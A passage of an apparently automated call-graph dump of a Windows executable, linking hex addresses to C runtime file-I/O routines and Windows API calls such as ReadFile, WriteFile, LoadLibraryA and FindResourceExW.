API calls 105160->105163 105164 f097a2 __chsize_nolock 82 API calls 105160->105164 105167 efd886 __write 78 API calls 105160->105167 105168 f083c1 105160->105168 105169 f018c1 60 API calls __lseeki64_nolock 105160->105169 105162 f08552 105161->105162 105165 efd43d __free_osfhnd 59 API calls 105162->105165 105163->105160 105164->105160 105165->105166 105166->105173 105167->105160 105170 f00add __close_nolock 61 API calls 105168->105170 105169->105160 105171 f083c8 105170->105171 105172 ef8b28 ___crtsetenv 58 API calls 105171->105172 105172->105173 105173->105104 105174->105094 105175->105100 105176->105100 105178 ed4b83 105177->105178 105179 ed4c3f LoadLibraryA 105177->105179 105178->104980 105178->104983 105179->105178 105180 ed4c50 GetProcAddress 105179->105180 105180->105178 105182 ed4ec0 105181->105182 105183 ed4ea3 FindResourceExW 105181->105183 105182->104994 105183->105182 105184 f0d933 LoadResource 105183->105184 105184->105182 105185 f0d948 SizeofResource 105184->105185 105185->105182 105186 f0d95c LockResource 105185->105186 105186->105182 105188 ed4ef4 105187->105188 105189 f0d9ab 105187->105189 105193 ef584d 105188->105193 105191 ed4f02 105191->104999 105192->104994 105196 ef5859 _flsall 105193->105196 105194 ef586b 105206 ef8b28 58 API calls __getptd_noexit 105194->105206 105196->105194 105197 ef5891 105196->105197 105208 ef6c11 105197->105208 105198 ef5870 105207 ef8db6 9 API calls ___crtsetenv 105198->105207 105200 ef5897 105214 ef57be 83 API calls 5 library calls 105200->105214 105203 ef58a6 105215 ef58c8 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105203->105215 105205 ef587b _flsall 105205->105191 105206->105198 105207->105205 105209 ef6c43 RtlEnterCriticalSection 105208->105209 105210 ef6c21 105208->105210 105212 ef6c39 105209->105212 105210->105209 105211 ef6c29 105210->105211 105213 ef9c0b __lock 58 API calls 105211->105213 105212->105200 105213->105212 105214->105203 105215->105205 105219 ef55fd 105216->105219 105218 ed4f2e 105218->105008 105220 ef5609 _flsall 105219->105220 105221 ef564c 105220->105221 105223 ef561f _memset 105220->105223 105231 ef5644 _flsall 105220->105231 105222 ef6c11 __lock_file 59 API calls 105221->105222 105224 ef5652 105222->105224 105246 ef8b28 58 API calls __getptd_noexit 105223->105246 105232 ef541d 105224->105232 105226 ef5639 105247 ef8db6 9 API calls ___crtsetenv 105226->105247 105231->105218 105234 ef5438 _memset 105232->105234 105239 ef5453 105232->105239 105233 ef5443 105344 ef8b28 58 API calls __getptd_noexit 105233->105344 105234->105233 105234->105239 105244 ef5493 105234->105244 105236 ef5448 105345 ef8db6 9 API calls ___crtsetenv 105236->105345 105248 ef5686 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105239->105248 105240 ef55a4 _memset 105347 ef8b28 58 API calls __getptd_noexit 105240->105347 105244->105239 105244->105240 105249 ef46e6 105244->105249 105256 f00e5b 105244->105256 105324 f00ba7 105244->105324 105346 f00cc8 58 API calls 3 library calls 105244->105346 105246->105226 105247->105231 105248->105231 105250 ef4705 105249->105250 105251 ef46f0 105249->105251 105250->105244 105348 ef8b28 58 API calls __getptd_noexit 105251->105348 105253 ef46f5 105349 ef8db6 9 API calls ___crtsetenv 105253->105349 105255 ef4700 105255->105244 105257 f00e93 105256->105257 105258 f00e7c 105256->105258 105260 f015cb 105257->105260 105265 f00ecd 105257->105265 105359 ef8af4 58 API calls __getptd_noexit 105258->105359 105375 ef8af4 58 API calls __getptd_noexit 105260->105375 105262 f00e81 105360 ef8b28 58 API calls __getptd_noexit 105262->105360 105263 f015d0 105376 ef8b28 58 API calls __getptd_noexit 105263->105376 105267 f00ed5 105265->105267 105274 f00eec 105265->105274 105361 ef8af4 58 API calls __getptd_noexit 105267->105361 105268 f00ee1 105377 ef8db6 9 API calls ___crtsetenv 105268->105377 105269 f00e88 105269->105244 105271 f00eda 105362 ef8b28 58 API calls __getptd_noexit 105271->105362 105273 f00f01 105363 ef8af4 58 API calls __getptd_noexit 105273->105363 105274->105269 105274->105273 105277 f00f1b 105274->105277 105278 f00f39 105274->105278 105277->105273 105279 f00f26 105277->105279 105364 ef881d 58 API calls 2 library calls 105278->105364 105350 f05c6b 105279->105350 105281 f00f49 105283 f00f51 105281->105283 105284 f00f6c 105281->105284 105365 ef8b28 58 API calls __getptd_noexit 105283->105365 105367 f018c1 60 API calls 3 library calls 105284->105367 105285 f0103a 105287 f010b3 ReadFile 105285->105287 105292 f01050 GetConsoleMode 105285->105292 105290 f01593 GetLastError 105287->105290 105291 f010d5 105287->105291 105289 f00f56 105366 ef8af4 58 API calls __getptd_noexit 105289->105366 105294 f015a0 105290->105294 105295 f01093 105290->105295 105291->105290 105299 f010a5 105291->105299 105296 f010b0 105292->105296 105297 f01064 105292->105297 105373 ef8b28 58 API calls __getptd_noexit 105294->105373 105306 f01099 105295->105306 105368 ef8b07 58 API calls 3 library calls 105295->105368 105296->105287 105297->105296 105300 f0106a ReadConsoleW 105297->105300 105299->105306 105307 f0110a 105299->105307 105308 f01377 105299->105308 105300->105299 105302 f0108d GetLastError 105300->105302 105301 f015a5 105374 ef8af4 58 API calls __getptd_noexit 105301->105374 105302->105295 105305 ef2d55 _free 58 API calls 105305->105269 105306->105269 105306->105305 105310 f01176 ReadFile 105307->105310 105315 f011f7 105307->105315 105308->105306 105314 f0147d ReadFile 105308->105314 105311 f01197 GetLastError 105310->105311 105322 f011a1 105310->105322 105311->105322 105312 f012b4 105318 f01264 MultiByteToWideChar 105312->105318 105371 f018c1 60 API calls 3 library calls 105312->105371 105313 f012a4 105370 ef8b28 58 API calls __getptd_noexit 105313->105370 105317 f014a0 GetLastError 105314->105317 105323 f014ae 105314->105323 105315->105306 105315->105312 105315->105313 105315->105318 105317->105323 105318->105302 105318->105306 105322->105307 105369 f018c1 60 API calls 3 library calls 105322->105369 105323->105308 105372 f018c1 60 API calls 3 library calls 105323->105372 105325 f00bb2 105324->105325 105329 f00bc7 105324->105329 105411 ef8b28 58 API calls __getptd_noexit 105325->105411 105327 f00bb7 105412 ef8db6 9 API calls ___crtsetenv 105327->105412 105330 f00bfc 105329->105330 105336 f00bc2 105329->105336 105413 f05fe4 58 API calls __malloc_crt 105329->105413 105332 ef46e6 __fflush_nolock 58 API calls 105330->105332 105333 f00c10 105332->105333 105378 f00d47 105333->105378 105335 f00c17 105335->105336 105337 ef46e6 __fflush_nolock 58 API calls 105335->105337 105336->105244 105338 f00c3a 105337->105338 105338->105336 105339 ef46e6 __fflush_nolock 58 API calls 105338->105339 105340 f00c46 105339->105340 105340->105336 105341 ef46e6 __fflush_nolock 58 API calls 105340->105341 105342 f00c53 105341->105342 105343 ef46e6 __fflush_nolock 58 API calls 105342->105343 105343->105336 105344->105236 105345->105239 105346->105244 105347->105236 105348->105253 105349->105255 105351 f05c83 105350->105351 105352 f05c76 105350->105352 105355 f05c8f 105351->105355 105356 ef8b28 ___crtsetenv 58 API calls 105351->105356 105353 ef8b28 ___crtsetenv 58 API calls 105352->105353 105354 f05c7b 105353->105354 105354->105285 105355->105285 105357 f05cb0 105356->105357 105358 ef8db6 ___crtsetenv 9 API calls 105357->105358 105358->105354 105359->105262 105360->105269 105361->105271 105362->105268 105363->105271 105364->105281 105365->105289 105366->105269 105367->105279 105368->105306 105369->105322 105370->105306 105371->105318 105372->105323 105373->105301 105374->105306 105375->105263 105376->105268 105377->105269 105379 f00d53 _flsall 105378->105379 105380 f00d60 105379->105380 105381 f00d77 105379->105381 105382 ef8af4 __close 58 API calls 105380->105382 105383 f00e3b 105381->105383 105386 f00d8b 105381->105386 105385 f00d65 105382->105385 105384 ef8af4 __close 58 API calls 105383->105384 105387 f00dae 105384->105387 105388 ef8b28 ___crtsetenv 58 API calls 105385->105388 105389 f00db6 105386->105389 105390 f00da9 105386->105390 105395 ef8b28 ___crtsetenv 58 API calls 105387->105395 105402 f00d6c _flsall 105388->105402 105392 f00dc3 105389->105392 105393 f00dd8 105389->105393 105391 ef8af4 __close 58 API calls 105390->105391 105391->105387 105396 ef8af4 __close 58 API calls 105392->105396 105394 efd206 ___lock_fhandle 59 API calls 105393->105394 105397 f00dde 105394->105397 105398 f00dd0 105395->105398 105399 f00dc8 105396->105399 105400 f00df1 105397->105400 105401 f00e04 105397->105401 105405 ef8db6 ___crtsetenv 9 API calls 105398->105405 105403 ef8b28 ___crtsetenv 58 API calls 105399->105403 105404 f00e5b __read_nolock 70 API calls 105400->105404 105406 ef8b28 ___crtsetenv 58 API calls 105401->105406 105402->105335 105403->105398 105407 f00dfd 105404->105407 105405->105402 105408 f00e09 105406->105408 105410 f00e33 __read RtlLeaveCriticalSection 105407->105410 105409 ef8af4 __close 58 API calls 105408->105409 105409->105407 105410->105402 105411->105327 105412->105336 105413->105330 105417 ef520a GetSystemTimeAsFileTime 105414->105417 105416 f38f6e 105416->105010 105418 ef5238 __aulldiv 105417->105418 105418->105416 105420 ef5c6c _flsall 105419->105420 105421 ef5c7e 105420->105421 105422 ef5c93 105420->105422 105433 ef8b28 58 API calls __getptd_noexit 105421->105433 105423 ef6c11 __lock_file 59 API calls 105422->105423 105425 ef5c99 105423->105425 105435 ef58d0 67 API calls 6 library calls 105425->105435 105426 ef5c83 105434 ef8db6 9 API calls ___crtsetenv 105426->105434 105429 ef5ca4 105436 ef5cc4 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105429->105436 105431 ef5cb6 105432 ef5c8e _flsall 105431->105432 105432->105015 105433->105426 105434->105432 105435->105429 105436->105431 105437->104877 105438->104885 105439->104899 105440->104901 105441->104898 105442->104907 105444 ed9169 Mailbox 105443->105444 105445 f0f19f 105444->105445 105449 ed9173 105444->105449 105446 ef0db6 Mailbox 59 API calls 105445->105446 105448 f0f1ab 105446->105448 105447 ed917a 105447->104911 105449->105447 105451 ed9c90 59 API calls Mailbox 105449->105451 105451->105449 105452->104922 105453->104917 105458 f39748 __tzset_nolock _wcscmp 105454->105458 105455 f39109 GetSystemTimeAsFileTime 105455->105458 105456 f395dc 105456->104928 105456->104954 105457 ed4f0b 74 API calls 105457->105458 105458->105455 105458->105456 105458->105457 105459 ed4ee5 85 API calls 105458->105459 105459->105458 105461 f38b11 105460->105461 105462 f38b1f 105460->105462 105463 ef525b 115 API calls 105461->105463 105464 f38b64 105462->105464 105465 ef525b 115 API calls 105462->105465 105487 f38b28 105462->105487 105463->105462 105491 f38d91 105464->105491 105467 f38b49 105465->105467 105467->105464 105469 f38b52 105467->105469 105468 f38ba8 105470 f38bcd 105468->105470 105471 f38bac 105468->105471 105472 ef53a6 __fcloseall 83 API calls 105469->105472 105469->105487 105495 f389a9 105470->105495 105474 f38bb9 105471->105474 105476 ef53a6 __fcloseall 83 API calls 105471->105476 105472->105487 105479 ef53a6 __fcloseall 83 API calls 105474->105479 105474->105487 105476->105474 105477 f38bfb 105504 f38c2b 105477->105504 105478 f38bdb 105480 f38be8 105478->105480 105482 ef53a6 __fcloseall 83 API calls 105478->105482 105479->105487 105484 ef53a6 __fcloseall 83 API calls 105480->105484 105480->105487 105482->105480 105484->105487 105487->104957 105488 f38c16 105488->105487 105490 ef53a6 __fcloseall 83 API calls 105488->105490 105490->105487 105492 f38db6 105491->105492 105494 f38d9f __tzset_nolock _memmove 105491->105494 105493 ef55e2 __fread_nolock 74 API calls 105492->105493 105493->105494 105494->105468 105496 ef571c _W_store_winword 58 API calls 105495->105496 105497 f389b8 105496->105497 105498 ef571c _W_store_winword 58 API calls 105497->105498 105499 f389cc 105498->105499 105500 ef571c _W_store_winword 58 API calls 105499->105500 105501 f389e0 105500->105501 105502 f38d0d 58 API calls 105501->105502 105503 f389f3 105501->105503 105502->105503 105503->105477 105503->105478 105508 f38c40 105504->105508 105505 f38cf8 105537 f38f35 105505->105537 105507 f38a05 74 API calls 105507->105508 105508->105505 105508->105507 105511 f38c02 105508->105511 105533 f38e12 105508->105533 105541 f38aa1 74 API calls 105508->105541 105512 f38d0d 105511->105512 105513 f38d20 105512->105513 105514 f38d1a 105512->105514 105516 f38d31 105513->105516 105517 ef2d55 _free 58 API calls 105513->105517 105515 ef2d55 _free 58 API calls 105514->105515 105515->105513 105518 ef2d55 _free 58 API calls 105516->105518 105519 f38c09 105516->105519 105517->105516 105518->105519 105519->105488 105520 ef53a6 105519->105520 105521 ef53b2 _flsall 105520->105521 105522 ef53de 105521->105522 105523 ef53c6 105521->105523 105525 ef6c11 __lock_file 59 API calls 105522->105525 105529 ef53d6 _flsall 105522->105529 105590 ef8b28 58 API calls __getptd_noexit 105523->105590 105528 ef53f0 105525->105528 105526 ef53cb 105591 ef8db6 9 API calls ___crtsetenv 105526->105591 105574 ef533a 105528->105574 105529->105488 105534 f38e21 105533->105534 105536 f38e61 105533->105536 105534->105508 105536->105534 105542 f38ee8 105536->105542 105538 f38f42 105537->105538 105539 f38f53 105537->105539 105540 ef4863 80 API calls 105538->105540 105539->105511 105540->105539 105541->105508 105543 f38f14 105542->105543 105544 f38f25 105542->105544 105546 ef4863 105543->105546 105544->105536 105547 ef486f _flsall 105546->105547 105548 ef488d 105547->105548 105549 ef48a5 105547->105549 105550 ef489d _flsall 105547->105550 105571 ef8b28 58 API calls __getptd_noexit 105548->105571 105551 ef6c11 __lock_file 59 API calls 105549->105551 105550->105544 105554 ef48ab 105551->105554 105553 ef4892 105572 ef8db6 9 API calls ___crtsetenv 105553->105572 105559 ef470a 105554->105559 105562 ef4719 105559->105562 105565 ef4737 105559->105565 105560 ef4727 105561 ef8b28 ___crtsetenv 58 API calls 105560->105561 105563 ef472c 105561->105563 105562->105560 105562->105565 105567 ef4751 _memmove 105562->105567 105564 ef8db6 ___crtsetenv 9 API calls 105563->105564 105564->105565 105573 ef48dd RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105565->105573 105566 efae1e __flsbuf 78 API calls 105566->105567 105567->105565 105567->105566 105568 ef4a3d __flush 78 API calls 105567->105568 105569 ef46e6 __fflush_nolock 58 API calls 105567->105569 105570 efd886 __write 78 API calls 105567->105570 105568->105567 105569->105567 105570->105567 105571->105553 105572->105550 105573->105550 105575 ef535d 105574->105575 105576 ef5349 105574->105576 105579 ef5359 105575->105579 105593 ef4a3d 105575->105593 105629 ef8b28 58 API calls __getptd_noexit 105576->105629 105578 ef534e 105630 ef8db6 9 API calls ___crtsetenv 105578->105630 105592 ef5415 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 105579->105592 105585 ef46e6 __fflush_nolock 58 API calls 105586 ef5377 105585->105586 105603 f00a02 105586->105603 105588 ef537d 105588->105579 105589 ef2d55 _free 58 API calls 105588->105589 105589->105579 105590->105526 105591->105529 105592->105529 105594 ef4a50 105593->105594 105598 ef4a74 105593->105598 105595 ef46e6 __fflush_nolock 58 API calls 105594->105595 105594->105598 105596 ef4a6d 105595->105596 105631 efd886 105596->105631 105599 f00b77 105598->105599 105600 ef5371 105599->105600 105601 f00b84 105599->105601 105600->105585 105601->105600 105602 ef2d55 _free 58 API calls 105601->105602 105602->105600 105604 f00a0e _flsall 105603->105604 105605 f00a32 105604->105605 105606 f00a1b 105604->105606 105608 f00abd 105605->105608 105610 f00a42 105605->105610 105756 ef8af4 58 API calls __getptd_noexit 105606->105756 105761 ef8af4 58 API calls __getptd_noexit 105608->105761 105609 f00a20 105757 ef8b28 58 API calls __getptd_noexit 105609->105757 105613 f00a60 105610->105613 105614 f00a6a 105610->105614 105758 ef8af4 58 API calls __getptd_noexit 105613->105758 105616 efd206 ___lock_fhandle 59 API calls 105614->105616 105615 f00a65 105762 ef8b28 58 API calls __getptd_noexit 105615->105762 105619 f00a70 105616->105619 105621 f00a83 105619->105621 105622 f00a8e 105619->105622 105620 f00ac9 105763 ef8db6 9 API calls ___crtsetenv 105620->105763 105741 f00add 105621->105741 105759 ef8b28 58 API calls __getptd_noexit 105622->105759 105625 f00a27 _flsall 105625->105588 105627 f00a89 105760 f00ab5 RtlLeaveCriticalSection __unlock_fhandle 105627->105760 105629->105578 105630->105579 105632 efd892 _flsall 105631->105632 105633 efd89f 105632->105633 105634 efd8b6 105632->105634 105732 ef8af4 58 API calls __getptd_noexit 105633->105732 105636 efd955 105634->105636 105638 efd8ca 105634->105638 105738 ef8af4 58 API calls __getptd_noexit 105636->105738 105637 efd8a4 105733 ef8b28 58 API calls __getptd_noexit 105637->105733 105641 efd8e8 105638->105641 105642 efd8f2 105638->105642 105734 ef8af4 58 API calls __getptd_noexit 105641->105734 105659 efd206 105642->105659 105643 efd8ed 105739 ef8b28 58 API calls __getptd_noexit 105643->105739 105646 efd8f8 105648 efd91e 105646->105648 105649 efd90b 105646->105649 105735 ef8b28 58 API calls __getptd_noexit 105648->105735 105668 efd975 105649->105668 105650 efd961 105740 ef8db6 9 API calls ___crtsetenv 105650->105740 105651 efd8ab _flsall 105651->105598 105655 efd917 105737 efd94d RtlLeaveCriticalSection __unlock_fhandle 105655->105737 105656 efd923 105736 ef8af4 58 API calls __getptd_noexit 105656->105736 105660 efd212 _flsall 105659->105660 105661 efd261 RtlEnterCriticalSection 105660->105661 105663 ef9c0b __lock 58 API calls 105660->105663 105662 efd287 _flsall 105661->105662 105662->105646 105664 efd237 105663->105664 105665 efd24f 105664->105665 105666 ef9e2b __ioinit InitializeCriticalSectionAndSpinCount 105664->105666 105667 efd28b ___lock_fhandle RtlLeaveCriticalSection 105665->105667 105666->105665 105667->105661 105669 efd982 __ftell_nolock 105668->105669 105670 efd9c1 105669->105670 105671 efd9e0 105669->105671 105699 efd9b6 105669->105699 105673 ef8af4 __close 58 API calls 105670->105673 105674 efda38 105671->105674 105675 efda1c 105671->105675 105672 efc5f6 __except_handler4 6 API calls 105676 efe1d6 105672->105676 105677 efd9c6 105673->105677 105678 efda51 105674->105678 105681 f018c1 __lseeki64_nolock 60 API calls 105674->105681 105680 ef8af4 __close 58 API calls 105675->105680 105676->105655 105679 ef8b28 ___crtsetenv 58 API calls 105677->105679 105683 f05c6b __read_nolock 58 API calls 105678->105683 105682 efd9cd 105679->105682 105684 efda21 105680->105684 105681->105678 105685 ef8db6 ___crtsetenv 9 API calls 105682->105685 105686 efda5f 105683->105686 105687 ef8b28 ___crtsetenv 58 API calls 105684->105687 105685->105699 105688 efddb8 105686->105688 105693 ef99ac __beginthread 58 API calls 105686->105693 105689 efda28 105687->105689 105690 efe14b WriteFile 105688->105690 105691 efddd6 105688->105691 105692 ef8db6 ___crtsetenv 9 API calls 105689->105692 105694 efddab GetLastError 105690->105694 105701 efdd78 105690->105701 105695 efdefa 105691->105695 105704 efddec 105691->105704 105692->105699 105696 efda8b GetConsoleMode 105693->105696 105694->105701 105705 efdf05 105695->105705 105709 efdfef 105695->105709 105696->105688 105698 efdaca 105696->105698 105697 efe184 105697->105699 105700 ef8b28 ___crtsetenv 58 API calls 105697->105700 105698->105688 105702 efdada GetConsoleCP 105698->105702 105699->105672 105707 efe1b2 105700->105707 105701->105697 105701->105699 105708 efded8 105701->105708 105702->105697 105726 efdb09 105702->105726 105703 efde5b WriteFile 105703->105694 105706 efde98 105703->105706 105704->105697 105704->105703 105705->105697 105710 efdf6a WriteFile 105705->105710 105706->105704 105711 efdebc 105706->105711 105712 ef8af4 __close 58 API calls 105707->105712 105713 efe17b 105708->105713 105714 efdee3 105708->105714 105709->105697 105715 efe064 WideCharToMultiByte 105709->105715 105710->105694 105716 efdfb9 105710->105716 105711->105701 105712->105699 105718 ef8b07 __dosmaperr 58 API calls 105713->105718 105717 ef8b28 ___crtsetenv 58 API calls 105714->105717 105715->105694 105724 efe0ab 105715->105724 105716->105701 105716->105705 105716->105711 105720 efdee8 105717->105720 105718->105699 105719 efe0b3 WriteFile 105722 efe106 GetLastError 105719->105722 105719->105724 105723 ef8af4 __close 58 API calls 105720->105723 105721 ef35f5 __write_nolock 58 API calls 105721->105726 105722->105724 105723->105699 105724->105701 105724->105709 105724->105711 105724->105719 105725 f07a5e WriteConsoleW CreateFileW __putwch_nolock 105730 efdc5f 105725->105730 105726->105701 105726->105721 105727 f062ba 60 API calls __write_nolock 105726->105727 105728 efdbf2 WideCharToMultiByte 105726->105728 105726->105730 105727->105726 105728->105701 105729 efdc2d WriteFile 105728->105729 105729->105694 105729->105730 105730->105694 105730->105701 105730->105725 105730->105726 105731 efdc87 WriteFile 105730->105731 105731->105694 105731->105730 105732->105637 105733->105651 105734->105643 105735->105656 105736->105655 105737->105651 105738->105643 105739->105650 105740->105651 105764 efd4c3 105741->105764 105743 f00b41 105777 efd43d 59 API calls 2 library calls 105743->105777 105745 f00aeb 105745->105743 105746 efd4c3 __lseek_nolock 58 API calls 105745->105746 105754 f00b1f 105745->105754 105749 f00b16 105746->105749 105747 efd4c3 __lseek_nolock 58 API calls 105750 f00b2b CloseHandle 105747->105750 105748 f00b49 105755 f00b6b 105748->105755 105778 ef8b07 58 API calls 3 library calls 105748->105778 105751 efd4c3 __lseek_nolock 58 API calls 105749->105751 105750->105743 105752 f00b37 GetLastError 105750->105752 105751->105754 105752->105743 105754->105743 105754->105747 105755->105627 105756->105609 105757->105625 105758->105615 105759->105627 105760->105625 105761->105615 105762->105620 105763->105625 105765 efd4ce 105764->105765 105766 efd4e3 105764->105766 105767 ef8af4 __close 58 API calls 105765->105767 105769 ef8af4 __close 58 API calls 105766->105769 105771 efd508 105766->105771 105768 efd4d3 105767->105768 105770 ef8b28 ___crtsetenv 58 API calls 105768->105770 105772 efd512 105769->105772 105773 efd4db 105770->105773 105771->105745 105774 ef8b28 ___crtsetenv 58 API calls 105772->105774 105773->105745 105775 efd51a 105774->105775 105776 ef8db6 ___crtsetenv 9 API calls 105775->105776 105776->105773 105777->105748 105778->105755 105780 f01940 __ftell_nolock 105779->105780 105781 ef079e GetLongPathNameW 105780->105781 105782 ed7bcc 59 API calls 105781->105782 105783 ed72bd 105782->105783 105784 ed700b 105783->105784 105785 ed7667 59 API calls 105784->105785 105786 ed701d 105785->105786 105787 ed4750 60 API calls 105786->105787 105788 ed7028 105787->105788 105789 f0e885 105788->105789 105790 ed7033 105788->105790 105795 f0e89f 105789->105795 105837 ed7908 61 API calls 105789->105837 105792 ed3f74 59 API calls 105790->105792 105793 ed703f 105792->105793 105831 ed34c2 105793->105831 105796 ed7052 Mailbox 105796->104711 105798 ed4ddd 136 API calls 105797->105798 105799 ed688f 105798->105799 105800 f0e031 105799->105800 105801 ed4ddd 136 API calls 105799->105801 105802 f3955b 122 API calls 105800->105802 105803 ed68a3 105801->105803 105804 f0e046 105802->105804 105803->105800 105805 ed68ab 105803->105805 105806 f0e067 105804->105806 105807 f0e04a 105804->105807 105809 f0e052 105805->105809 105810 ed68b7 105805->105810 105808 ef0db6 Mailbox 59 API calls 105806->105808 105811 ed4e4a 84 API calls 105807->105811 105830 f0e0ac Mailbox 105808->105830 105944 f342f8 91 API calls _wprintf 105809->105944 105838 ed6a8c 105810->105838 105811->105809 105815 f0e060 105815->105806 105816 f0e260 105817 ef2d55 _free 58 API calls 105816->105817 105818 f0e268 105817->105818 105819 ed4e4a 84 API calls 105818->105819 105824 f0e271 105819->105824 105823 ef2d55 _free 58 API calls 105823->105824 105824->105823 105825 ed4e4a 84 API calls 105824->105825 105948 f2f7a1 90 API calls 4 library calls 105824->105948 105825->105824 105827 ed7de1 59 API calls 105827->105830 105830->105816 105830->105824 105830->105827 105930 ed750f 105830->105930 105938 ed735d 105830->105938 105945 f2f73d 59 API calls 2 library calls 105830->105945 105946 f2f65e 61 API calls 2 library calls 105830->105946 105947 f3737f 59 API calls Mailbox 105830->105947 105832 ed34d4 105831->105832 105836 ed34f3 _memmove 105831->105836 105835 ef0db6 Mailbox 59 API calls 105832->105835 105833 ef0db6 Mailbox 59 API calls 105834 ed350a 105833->105834 105834->105796 105835->105836 105836->105833 105837->105789 105839 ed6ab5 105838->105839 105840 f0e41e 105838->105840 105954 ed57a6 60 API calls Mailbox 105839->105954 106021 f2f7a1 90 API calls 4 library calls 105840->106021 105843 ed6ad7 105955 ed57f6 67 API calls 105843->105955 105844 f0e431 106022 f2f7a1 90 API calls 4 library calls 105844->106022 105846 ed6aec 105846->105844 105848 ed6af4 105846->105848 105850 ed7667 59 API calls 105848->105850 105849 f0e44d 105852 ed6b61 105849->105852 105851 ed6b00 105850->105851 105956 ef0957 60 API calls __ftell_nolock 105851->105956 105854 f0e460 105852->105854 105855 ed6b6f 105852->105855 105858 ed5c6f CloseHandle 105854->105858 105859 ed7667 59 API calls 105855->105859 105856 ed6b0c 105857 ed7667 59 API calls 105856->105857 105860 ed6b18 105857->105860 105861 f0e46c 105858->105861 105862 ed6b78 105859->105862 105863 ed4750 60 API calls 105860->105863 105864 ed4ddd 136 API calls 105861->105864 105865 ed7667 59 API calls 105862->105865 105866 ed6b26 105863->105866 105867 f0e488 105864->105867 105868 ed6b81 105865->105868 105957 ed5850 ReadFile SetFilePointerEx 105866->105957 105870 f0e4b1 105867->105870 105874 f3955b 122 API calls 105867->105874 105959 ed459b 105868->105959 106023 f2f7a1 90 API calls 4 library calls 105870->106023 105873 ed6b52 105958 ed5aee SetFilePointerEx SetFilePointerEx 105873->105958 105877 f0e4a4 105874->105877 105875 ed6b98 105878 ed7b2e 59 API calls 105875->105878 105880 f0e4ac 105877->105880 105881 f0e4cd 105877->105881 105879 ed6ba9 SetCurrentDirectoryW 105878->105879 105886 ed6bbc Mailbox 105879->105886 105883 ed4e4a 84 API calls 105880->105883 105882 ed4e4a 84 API calls 105881->105882 105884 f0e4d2 105882->105884 105883->105870 105885 ef0db6 Mailbox 59 API calls 105884->105885 105892 f0e506 105885->105892 105888 ef0db6 Mailbox 59 API calls 105886->105888 105890 ed6bcf 105888->105890 105889 ed3bbb 105889->104578 105889->104604 105891 ed522e 59 API calls 105890->105891 105899 ed6bda Mailbox __NMSG_WRITE 105891->105899 105893 ed750f 59 API calls 105892->105893 105925 f0e54f Mailbox 105893->105925 105894 ed6ce7 106017 ed5c6f 105894->106017 105897 f0e740 106028 f372df 59 API calls Mailbox 105897->106028 105898 ed6cf3 SetCurrentDirectoryW 105900 ed6d0c Mailbox 105898->105900 105899->105894 105907 f0e7d9 105899->105907 105914 f0e7d1 105899->105914 105917 ed7de1 59 API calls 105899->105917 106010 ed586d 67 API calls _wcscpy 105899->106010 106011 ed6f5d GetStringTypeW 105899->106011 106012 ed6ecc 60 API calls __wcsnicmp 105899->106012 106013 ed6faa GetStringTypeW __NMSG_WRITE 105899->106013 106014 ef363d GetStringTypeW _iswctype 105899->106014 106015 ed68dc 166 API calls 3 library calls 105899->106015 106016 ed7213 59 API calls Mailbox 105899->106016 105949 ed57d4 105900->105949 105903 f0e762 106029 f4fbce 59 API calls 2 library calls 105903->106029 105906 f0e76f 105908 ef2d55 _free 58 API calls 105906->105908 106032 f2f7a1 90 API calls 4 library calls 105907->106032 105908->105900 105911 ed750f 59 API calls 105911->105925 105912 f0e7f2 105912->105894 106031 f2f5f7 59 API calls 4 library calls 105914->106031 105917->105899 105920 ed7de1 59 API calls 105920->105925 105924 f0e792 106030 f2f7a1 90 API calls 4 library calls 105924->106030 105925->105897 105925->105911 105925->105920 105925->105924 106024 f2f73d 59 API calls 2 library calls 105925->106024 106025 f2f65e 61 API calls 2 library calls 105925->106025 106026 f3737f 59 API calls Mailbox 105925->106026 106027 ed7213 59 API calls Mailbox 105925->106027 105927 f0e7ab 105928 ef2d55 _free 58 API calls 105927->105928 105929 f0e4c8 105928->105929 105929->105900 105931 ed75af 105930->105931 105934 ed7522 _memmove 105930->105934 105933 ef0db6 Mailbox 59 API calls 105931->105933 105932 ef0db6 Mailbox 59 API calls 105935 ed7529 105932->105935 105933->105934 105934->105932 105936 ef0db6 Mailbox 59 API calls 105935->105936 105937 ed7552 105935->105937 105936->105937 105937->105830 105939 ed7370 105938->105939 105943 ed741e 105938->105943 105940 ef0db6 Mailbox 59 API calls 105939->105940 105942 ed73a2 105939->105942 105940->105942 105941 ef0db6 59 API calls Mailbox 105941->105942 105942->105941 105942->105943 105943->105830 105944->105815 105945->105830 105946->105830 105947->105830 105948->105824 105950 ed5c6f CloseHandle 105949->105950 105951 ed57dc Mailbox 105950->105951 105952 ed5c6f CloseHandle 105951->105952 105953 ed57eb 105952->105953 105953->105889 105954->105843 105955->105846 105956->105856 105957->105873 105958->105852 105960 ed7667 59 API calls 105959->105960 105961 ed45b1 105960->105961 105962 ed7667 59 API calls 105961->105962 105963 ed45b9 105962->105963 105964 ed7667 59 API calls 105963->105964 105965 ed45c1 105964->105965 105966 ed7667 59 API calls 105965->105966 105967 ed45c9 105966->105967 105968 ed45fd 105967->105968 105969 f0d4d2 105967->105969 105970 ed784b 59 API calls 105968->105970 105971 ed8047 59 API calls 105969->105971 105972 ed460b 105970->105972 105973 f0d4db 105971->105973 105974 ed7d2c 59 API calls 105972->105974 105975 ed7d8c 59 API calls 105973->105975 105976 ed4615 105974->105976 105978 ed4640 105975->105978 105977 ed784b 59 API calls 105976->105977 105976->105978 105981 ed4636 105977->105981 105979 ed4680 105978->105979 105982 ed465f 105978->105982 105992 f0d4fb 105978->105992 106033 ed784b 105979->106033 105984 ed7d2c 59 API calls 105981->105984 105986 ed79f2 59 API calls 105982->105986 105983 ed4691 105987 ed46a3 105983->105987 105990 ed8047 59 API calls 105983->105990 105984->105978 105985 f0d5cb 105988 ed7bcc 59 API calls 105985->105988 105989 ed4669 105986->105989 105991 ed46b3 105987->105991 105994 ed8047 59 API calls 105987->105994 106009 f0d588 105988->106009 105989->105979 105993 ed784b 59 API calls 105989->105993 105990->105987 105996 ed46ba 105991->105996 105997 ed8047 59 API calls 105991->105997 105992->105985 105995 f0d5b4 105992->105995 106006 f0d532 105992->106006 105993->105979 105994->105991 105995->105985 105999 f0d59f 105995->105999 105998 ed8047 59 API calls 105996->105998 106005 ed46c1 Mailbox 105996->106005 105997->105996 105998->106005 106001 ed7bcc 59 